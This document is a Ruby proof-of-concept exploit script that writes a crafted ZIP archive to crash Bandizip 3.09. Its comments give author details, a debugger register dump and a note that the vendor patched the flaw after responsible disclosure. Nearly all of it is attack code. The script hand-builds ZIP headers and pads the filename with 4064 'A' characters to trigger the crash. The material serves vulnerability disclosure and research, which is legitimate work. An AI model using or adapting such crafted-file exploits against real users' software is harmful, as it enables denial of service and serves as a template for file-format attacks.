#!/usr/bin/env ruby # Exploit Title: Bandizip 3.09 .zip Crash POC # Date: February 6th 2014 # Author: Osanda Malith Jayathissa # E-Mail: osandajayathissa<at>gmail.com # Version: 3.09 32bit and 64bit (Below versions might be affected) # Vendor Homepage: http://www.bandisoft.com/ # Tested on: Windows XP 32-bit SP2 en, Windows 8 64-bit # This issue is patched in Bandizip 3.10 after a responsible disclosure # Open this crafted file and double click on it in the app it self =begin eax=00000000 ebx=0374fad0 ecx=00000000 edx=00000000 esi=0374fa54 edi=00000000 eip=770be1a4 esp=0374f92c ebp=0374faac iopl=0 nv up ei pl nz na po nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202 ntdll!ZwWaitForMultipleObjects+0xc: 770be1a4 c21400 ret 14h =end # Ensure we have valid ZIP Header lf_header = "\x50\x4B\x03\x04\x14\x00\x00" lf_header += "\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00" lf_header += "\x00\x00\x00\x00\x00\x00\x00\x00" lf_header += "\xe4\x0f" #file size lf_header += "\x00\x00\x00" cdf_header = "\x50\x4B\x01\x02\x14\x00\x14" cdf_header += "\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00" cdf_header += "\x00\x00\x00\x00\x00\x00\x00\x00\x00" cdf_header += "\xe4\x0f" # file size cdf_header += "\x00\x00\x00\x00\x00\x00\x01\x00" cdf_header += "\x24\x00\x00\x00\x00\x00\x00\x00" eofcdf_header = "\x50\x4B\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00" eofcdf_header += "\x12\x10\x00\x00" # Size of central directory (bytes) eofcdf_header += "\x02\x10\x00\x00" # Offset of start of central directory,relative to start of archive eofcdf_header += "\x00\x00" # Our Payload payload = "A" * 4064 payload += ".txt" Exploit = lf_header + payload + cdf_header + payload + eofcdf_header f=File.open('bandizip.zip', 'w') f.write(Exploit) f.close #EOF